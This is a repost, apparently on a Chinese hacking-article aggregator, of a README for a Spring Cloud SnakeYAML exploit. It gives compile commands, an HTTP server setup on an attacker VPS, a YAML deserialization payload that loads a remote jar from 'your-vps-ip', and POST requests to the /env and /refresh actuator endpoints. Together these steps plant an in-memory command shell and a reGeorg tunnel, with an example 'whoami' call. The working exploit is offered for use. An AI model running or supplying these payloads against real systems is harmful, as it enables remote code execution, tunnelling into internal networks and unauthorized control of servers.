记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Spring Cloud SnakeYAML 一键注册内存cmd shell和reGeorg

2020-09-24 21:03

项目地址

https://github.com/Y4er/yaml-payload

README

利用条件:
– 可以 POST 请求目标网站的 /env 接口设置属性
– 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
– 目标依赖的 spring-cloud-starter 版本 < 1.3.0.RELEASE
– 目标可以请求攻击者的 HTTP 服务器(请求可出外网)

仅在JDK1.8及Spring1.x测试通过,其他版本自测.

利用方法如下:

编译class文件然后打jar包

cd yaml-payload
javac src/artsploit/AwesomeScriptEngineFactory.java -cp ./lib
javac src/artsploit/Tunnel.java -cp ./lib
javac src/artsploit/GameInfo.java -cp ./lib
jar -cvf yaml-payload.jar -C src/ .

托管 yml 和 jar 文件

在自己控制的vps机器上开启一个简单HTTP服务器,端口尽量使用常见HTTP服务端口(80、443)

# 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

在网站根目录下放置后缀为yml的文件yaml-payload.yml,内容如下:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/yaml-payload.jar"]
  ]]
]

在网站根目录下放置打包好的yaml-payload.jar

设置spring.cloud.bootstrap.location属性

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/yaml-payload.yml

刷新配置

POST /refresh
Content-Type: application/x-www-form-urlencoded

访问注入的shell

  1. reGeorg: http://localhost:9092/api/v1/tunnel
  2. cmd shell: http://localhost:9092/api/v1/game POST:code=whoami

参考

  1. https://github.com/LandGrey/SpringBootVulExploit
  2. https://www.anquanke.com/post/id/198886
  3. https://github.com/artsploit/yaml-payload

知识来源: https://www.chabug.org/web/1913.html

阅读:101496 | 评论:0 | 标签:shell 内存

想收藏或者和大家分享这篇好文章→复制链接地址

“Spring Cloud SnakeYAML 一键注册内存cmd shell和reGeorg”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁